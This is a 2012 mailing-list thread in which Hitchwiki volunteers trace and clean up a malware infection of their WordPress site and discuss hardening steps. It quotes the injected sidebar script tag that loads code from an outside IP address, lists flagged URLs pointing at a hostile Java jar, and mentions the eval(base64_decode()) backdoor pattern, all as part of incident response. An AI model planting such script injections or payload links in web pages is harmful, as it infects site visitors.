Malware on hitchwiki?

[Philipp Gruber]

Today, when opening hitchwiki, my firefox sent me here:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-GB&site=http://hitchwiki.org/en/Special:RecentChanges

Google says it found malware on hitchwiki, but unfortunately it doesn't
tell us where :(

Anyone knows what that is supposed to mean?

I am at work atm, so I don't have time to look into that properly.

[Kasper Souren]

From https://www.google.com/webmasters/tools/malware?hl=en&siteUrl=http://hitchwiki.org/

URLs Type Last checked
http://hitchwiki.org/amor/class.class Error Template 11/13/12
http://hitchwiki.org/forums/amor.class/ Error Template 11/13/12
http://hitchwiki.org/groups/amor.class/ Error Template 11/13/12
http://hitchwiki.org/groups/hitchhiking/amor.class/ Error Template 11/13/12
http://hitchwiki.org/groups/hitchhiking/members/amor.class/

[Mikael Korpela]

I'm also short of time to look more deep into this now, but just came to my mind — when we updated mediawiki, we took CAPTCHA plugin off cuz it didn't work very well with new mediawiki. Maybe time to bring it back?

Mikael

> --
> You received this message because you are subscribed to the Google Groups "hitchwiki" group.
> To post to this group, send email to hitc...@googlegroups.com.
> To unsubscribe from this group, send email to hitchwiki+...@googlegroups.com.
> For more options, visit this group at http://groups.google.com/group/hitchwiki?hl=en.
>

[Kasper Souren]

On Wed, Nov 14, 2012 at 9:39 AM, Mikael Korpela
<mikael....@gmail.com> wrote:
>> URLs Type Last checked
>> http://hitchwiki.org/amor/class.class Error Template 11/13/12
>> http://hitchwiki.org/forums/amor.class/ Error Template 11/13/12
>> http://hitchwiki.org/groups/amor.class/ Error Template 11/13/12
>> http://hitchwiki.org/groups/hitchhiking/amor.class/ Error Template 11/13/12
>> http://hitchwiki.org/groups/hitchhiking/members/amor.class/

I'm getting some 404s but
http://hitchwiki.org/groups/hitchhiking/members/amor.class/ is still
there.
Can someone remove this URL or user as well?

Then we can request a review on google webmasters and things will be
fine again soon, hopefully.

Kasper

[Mikael Korpela]

I don't see this user from the WP, so somebody maybe removed it already?

http://hitchwiki.org/wp-admin/network/users.php

Mikael

[Kasper Souren]

There's still malware apparently...

URLs Type Last checked
http://hitchwiki.org/groups/lgbtq-hitchers/--http:/arcobalenofoz.com.br/tmp/jar/java7.jar?r=591354 Error
Template 11/16/12
http://hitchwiki.org/groups/hitchhiking/forum/topic/planning-my-first-ride/amor.class/ Code
Injection 11/16/12
http://hitchwiki.org/--http:/arcobalenofoz.com.br/tmp/jar/java7.jar?r=907069 Error
Template 11/16/12
http://hitchwiki.org/groups/hitchhiking/forum/topic/newbies-hitching-from-s-germany-east-through-europe/amor.class/ Code
Injection 11/16/12
http://hitchwiki.org/groups/hitchhiking/forum/topic/arizona-and-new-mexico-any-advice/amor.class/ Code
Injection 11/16/12
http://hitchwiki.org/contact/--http:/arcobalenofoz.com.br/tmp/jar/java7.jar?r=953580 Error
Template 11/16/12

It's most likely a leak somewhere in wordpress and we should clean all of it:

- upgrade everything to all latest versions
- disable and delete anything that's not used
- check if there's a user who has more permissions than needed

Kasper

[Kasper Souren]

I installed the Secure WordPress plugin now. That will help in the
future, but not now.

Then it looks like some WP stuff was upgraded but I can't easily see
differences in git.

TODO

- disable and delete anything that's not used

- make sure git has no diffs
- one by one for WP and modules
- get fresh version from wordpress.org
- git commit

[Kasper Souren]

I removed all unused WP plugins.

I'm not sure which themes can be removed, but ideally we remove all but one.

Then from now on we should *always* make sure that all new stuff is
committed to git right away. Like that it's much easier to spot the
issue.

http://ottopress.com/2009/hacked-wordpress-backdoors/ is a good read...

We still need to delete and then download all existing plugins and WP
core. All the while keep git tight to spot any anomalies.

[Mikael Korpela]

Yeah, removing old plugins was probably good idea. There was all sorts of stuff from old times and I was not sure what it's all for, if they were used in some blog or not. Old plugins, bad. Especially when not chosen/reviewed by a developer.

Same goes for mediawiki extensions: as I know we should get rid of / replace Flattr plugin, since it's not done very well and might have security issues.

P2, twenty* plugins are by WP-folks so those are fine. Rest I didn't install so I don't know from what sources they are. Plus there are some tens of people using these themes. I can at some point try to go through if there are unused themes or if some of them are not included in update scripts but would still have new versions available.

I just replaced all the WP core files with fresh ones.

You're right, let's keep on git-prodecure. Could you write simple 123-howto for everybody here? I'm on pretty basic level on git at least: I just "push origin master" the changes from dev-folder and pull them to the live folder?

Also, if somebody with rights could make a seperate sql user account only for WP, that could read/write only WP-database, would also secure things up.

WP itself is pretty secure (they haven't had core security problems for long time now), but plugins is real shit you need to be careful with and look into the code before choosing to use one.

Mikael

[Kasper Souren]

Callum is doing some good things right now. He probably found and fixed one backdoor already.

Sent from my mobile phone

[Mikael Korpela]

Oh you just should've asked. :-D If you need to be superadmin, look into the wp-config.php - I think they were static there.

There were no custom core files.

If you're on it, could you perform sql search to check if there are occurances of that URL around the DB?

Thousands thanks!

Mikael

On 19.11.2012, at 18.21, Callum Macdonald <callum.m...@gmail.com> wrote:

The biggest challenge was adding myself as an admin! I didn't realise you were all online, or I'd have asked somebody to do that for me! Anyway, done now. There was a sidebar widget with the following text:
<script type="text/javascript" src="http://61.19.251.27/web/cb.php"></script>

The issue is how did that get in there? In theory, it should only be possible to add widgets as a site admin (which I now am btw!). I've deleted the widget, WP doesn't store anything like when it was created, by whom, etc.

When I first logged on, the admin was broken. htdocs/wp-admin/admin.php was missing. I dumped a whole new copy of WordPress on top of the whole htdocs folder. So any custom coding in any core WP files was wiped out in one move. I took a full backup (htdocs/db) before starting, you'll find the files above htdocs, obviously named.

I'll continue poking around for a while now...

Love & joy - Callum.

To view this discussion on the web visit https://groups.google.com/d/msg/hitchwiki/-/ADFqNMeMsKAJ.

[Callum Macdonald]

There's nothing in wp_options or wp_sitemeta, the most obvious candidates. But in my experience, these things tend to be some code tucked into an editable PHP file somewhere that usually looks something like eval(base64_decode('xxx')); specifically so that grepping for a specific url / etc won't find the hack. I'm not sure if WP was just recently updated and maybe an old exploit was used to edit the sidebar. I've never seen that sort of attack used before. I'd guess it originates from one of the users who has some privileges and somehow found a privilege escalation exploit to add the javascript to the sidebar.

As a sidenote, on my own installs, I never allow WordPress to upgrade itself. WordPress cannot edit PHP files, they are not writable by the web server, some folks would call me paranoid... :-)

Love & joy - Callum.

[Philipp Gruber]

Hi Callum,

Good work, thanks :)

Do you have jabber? If so, add me:
mrt...@jabber.teamidiot.de
(or icq 73498437)
This all runs on my server, so I have access to really anything.
My timezone is UTC+11.

Cheers,
Philipp

On Mon, Nov 19, 2012 at 09:21:23AM -0800, Callum Macdonald wrote:
> The biggest challenge was adding myself as an admin! I didn't realise you
> were all online, or I'd have asked somebody to do that for me! Anyway, done
> now. There was a sidebar widget with the following text:
> <script type="text/javascript" src="http://61.19.251.27/web/cb.php
> "></script>
>
> The issue is how did that get in there? In theory, it should only be
> possible to add widgets as a site admin (which I now am btw!). I've deleted
> the widget, WP doesn't store anything like when it was created, by whom,
> etc.
>
> When I first logged on, the admin was broken. htdocs/wp-admin/admin.php was
> missing. I dumped a whole new copy of WordPress on top of the whole htdocs
> folder. So any custom coding in any core WP files was wiped out in one
> move. I took a full backup (htdocs/db) before starting, you'll find the
> files above htdocs, obviously named.
>
> I'll continue poking around for a while now...
>
> Love & joy - Callum.
>
> On Monday, November 19, 2012 3:02:12 PM UTC-2, Kasper Souren wrote:
> >

> > Callum is doing some good things right now. He probably found and fixed
> > one backdoor already.
> >
> > Sent from my mobile phone

> > On Nov 19, 2012 2:45 PM, "Mikael Korpela" <mikael....@gmail.com<javascript:>>

> > wrote:
> >
> >> Yeah, removing old plugins was probably good idea. There was all sorts of
> >> stuff from old times and I was not sure what it's all for, if they were
> >> used in some blog or not. Old plugins, bad. Especially when not
> >> chosen/reviewed by a developer.
> >>
> >> Same goes for mediawiki extensions: as I know we should get rid of /
> >> replace Flattr plugin, since it's not done very well and might have
> >> security issues.
> >>
> >> P2, twenty* plugins are by WP-folks so those are fine. Rest I didn't
> >> install so I don't know from what sources they are. Plus there are some
> >> tens of people using these themes. I can at some point try to go through if
> >> there are unused themes or if some of them are not included in update
> >> scripts but would still have new versions available.
> >>
> >> I just replaced all the WP core files with fresh ones.
> >>
> >> You're right, let's keep on git-prodecure. Could you write simple
> >> 123-howto for everybody here? I'm on pretty basic level on git at least: I
> >> just "push origin master" the changes from dev-folder and pull them to the
> >> live folder?
> >>
> >> Also, if somebody with rights could make a seperate sql user account only
> >> for WP, that could read/write only WP-database, would also secure things up.
> >>
> >> WP itself is pretty secure (they haven't had core security problems for
> >> long time now), but plugins is real shit you need to be careful with and
> >> look into the code before choosing to use one.
> >>
> >> Mikael
> >>
> >>

> >> On 19.11.2012, at 0.40, Kasper Souren <kasper...@gmail.com <javascript:>>

> >> wrote:
> >>
> >> > I removed all unused WP plugins.
> >> >
> >> > I'm not sure which themes can be removed, but ideally we remove all but
> >> one.
> >> >
> >> > Then from now on we should *always* make sure that all new stuff is
> >> > committed to git right away. Like that it's much easier to spot the
> >> > issue.
> >> >
> >> > http://ottopress.com/2009/hacked-wordpress-backdoors/ is a good read...
> >> >
> >> > We still need to delete and then download all existing plugins and WP
> >> > core. All the while keep git tight to spot any anomalies.
> >> >
> >> > --
> >> > You received this message because you are subscribed to the Google
> >> Groups "hitchwiki" group.

> >> > To post to this group, send email to hitc...@googlegroups.com<javascript:>
> >> .

> >> > To unsubscribe from this group, send email to

> >> hitchwiki+...@googlegroups.com <javascript:>.

> >> > For more options, visit this group at
> >> http://groups.google.com/group/hitchwiki?hl=en.
> >> >
> >>
> >> --
> >> You received this message because you are subscribed to the Google Groups
> >> "hitchwiki" group.

> >> To post to this group, send email to hitc...@googlegroups.com<javascript:>
> >> .

> >> To unsubscribe from this group, send email to

> >> hitchwiki+...@googlegroups.com <javascript:>.

> >> For more options, visit this group at
> >> http://groups.google.com/group/hitchwiki?hl=en.
> >>
> >>
>
> --
> You received this message because you are subscribed to the Google Groups "hitchwiki" group.

> To view this discussion on the web visit https://groups.google.com/d/msg/hitchwiki/-/ADFqNMeMsKAJ.

[Kasper Souren]

Google Webmaster says "Status of the latest badware review for this
site: A review for this site has finished. The site was found clean.
The badware warnings from web search are being removed. Please note
that it can take some time for this change to propagate."

> WordPress cannot edit PHP files, they are not writable by the web server

We should have this!

Kasper

[Mikael Korpela]

Hola.

I was too much in a hurry to email yesterday, but:

I removed yesterday the script again from the widgets, meaning that there probably is a backdoor still somewhere. I also installed a widget hook on WP that sends me an email and removes the script when is finds it again. I'll look at some point if there's a hook on WP when widgets are added: then I could just put it email me the info and I'd see from the URL/post/get's where the backdoor is.

Or then widget is being added directly to the SQL and WP hook wouldn't bust it...

I also removed most of the plugins and all the unused themes.


I found only this about the issue: http://wordpress.org/support/topic/malware-links-script-from-wwwargoautonet?replies=20

Mikael

> --
> You received this message because you are subscribed to the Google Groups "hitchwiki" group.

[Mikael Korpela]

>>
>> WordPress cannot edit PHP files, they are not writable by the web server
>
> We should have this!

This and SQL account only to use with WP. I don't have rights to play around with rights, tho...

Mikael


On 22.11.2012, at 1.02, Kasper Souren <kasper...@gmail.com> wrote:

> --
> You received this message because you are subscribed to the Google Groups "hitchwiki" group.